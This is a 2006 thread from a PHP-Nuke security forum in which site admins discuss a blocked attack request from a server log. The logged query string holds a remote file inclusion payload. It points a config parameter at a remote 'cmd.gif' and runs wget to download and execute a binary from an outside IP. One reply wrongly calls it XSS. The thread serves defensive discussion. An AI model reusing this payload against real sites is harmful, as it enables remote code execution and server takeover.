Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Attack I haven't seen before...any ideas what it does?
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Dauthus
Worker
Worker



Joined: Oct 07, 2003
Posts: 211
PostPosted: Tue Jun 20, 2006 6:33 pm Reply with quote
Date & Time: 2006-06-20 14:58:35 EDT GMT -0400 Blocked IP: 216.235.153.4 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) Query String: XXX.XXX.XXX.XX/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd /tmp;wget 72.18.195.161/lnikon;chmod 744 lnikon;./lnikon;echo YYY;echo| Get String: XX.XXX.XXX.XX/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd /tmp;wget 72.18.195.161/lnikon;chmod 744 lnikon;./lnikon;echo YYY;echo| Post String: 207.234.134.66/index.php Forwarded For: none Client IP: none Remote Address: 216.235.153.4 Remote Port: 41763 Request Method: GET

This is the first time I have actually seen this one. I have XXX out the IP of my domain, but everything else has been left as is.

I just checked my email and this same attack went on every Nuke site I have running on the server. This dude has been busy!

_________________
Image
Vivere disce, cogita mori

Last edited by Dauthus on Tue Jun 20, 2006 6:45 pm; edited 1 time in total 
View user's profile Send private message Visit poster's website
gregexp
The Mouse Is Extension Of Arm



Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol
PostPosted: Tue Jun 20, 2006 6:42 pm Reply with quote
its been listed before

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
Dauthus
PostPosted: Tue Jun 20, 2006 6:46 pm Reply with quote
Can you give me a link to what it does? Curiosity is getting the best of me.
 
gregexp
PostPosted: Tue Jun 20, 2006 8:43 pm Reply with quote
i wish i knew what it does exactly...seems hitwalker has a better knowledge of this then i
 
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
PostPosted: Wed Jun 21, 2006 3:31 am Reply with quote
This attack is not for any nuke file I am aware of. I know of no known modules etc that uses the function 'com_content'.
The actual file they are using to attempt a XSS attack is 'cmd.gif' and despite it having a gif extension, it isn't an image file Wink
 
View user's profile Send private message Send e-mail
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©